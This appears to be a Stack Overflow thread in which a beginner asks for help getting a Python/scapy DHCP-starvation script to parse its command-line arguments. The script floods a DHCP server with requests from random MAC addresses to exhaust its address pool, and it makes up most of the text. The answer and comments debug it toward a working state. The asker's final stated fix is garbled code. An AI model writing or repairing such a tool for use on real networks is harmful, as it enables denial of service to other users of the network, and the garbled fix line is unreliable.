# arg is not defined , argv makes one list. whats wrong?

Tags: python, python-3.x

I'm new to python and scapy. I'm trying to make a DHCP-starvation script. Only my arguments are not working. I get a NameError: name 'arg' is not defined error. When I change arg to argv i only get one list. What am I doing wrong?

```
#!/usr/bin/python3
from scapy.all import *
import sys
import time
import getopt


def main(argv):
    conf.checkIPaddr = False   
    brmac = 'ff:ff:ff:ff:ff:ff'
    network = ""
    serverid = ""
    begin = 1
    end = 1

    try:
       opts, args = getopt.getopt(argv,"hnsb:e:")
    except getopt.GetoptError:
       print("dhcp.py -n 192.168.1. -s 192.168.1.1 -b 20 -e 250")
        sys.exit(2)
    for opt, args in opts:
        if opt == "-h":
            print("dhcp.py -n 192.168.1. -s 192.168.1.1 -b 20 -e 250")
            sys.exit()
        elif opt in ("-n"):
            network = arg
        elif opt in("-s"):
            serverid = arg 
        elif opt in ("-b"):
            begin = arg
        elif opt in("e"):  
            end = arg
    for ip in range(int(begin), int(end)):
        adr = RandMAC()
        sendp(Ether(src=adr, dst=brmac)/IP(src='0.0.0.0', dst='255.255.255.255')/UDP(sport=68, dport=67)/BOOTP(chaddr=adr)/DHCP(options=[('message-type', 'request'),("server_id",str(serverid)), ("requested_addr",str(network) + str(ip)), 'end']))
        print("requesting ip " + str(network) + str(ip))
        time.sleep(2)



if __name__ == "__main__":
   main(sys.argv[1:])
```

Answer (score 1):

You're using `for opt, args in opts:` as for loop, but then inside that for loop you're trying to refer to `args` as `arg` which does not exist.

Possible solutions to solve your error:

- Change `arg` inside the for loop to `args`, so it matches the variable in the for loop
- Change the variable name `args` to `arg`, so it matches the variable in your code

Comment: Thanks stupid i didn saw that sorry. But now the problem is that the input of the arguments aren't written to the variables. any idea why?

Comment: I think maybe you're meant to type `"e" in opt` instead of `opt in "e"`? You have that construction multiple times in your code.

Comment: Found it. opts, opts, args = getopt.getopt(argv,"hnsb:e:") needs to be args = getopt.getopt(argv,"hn:s:b:e:"). Dankjewel voor je hulp!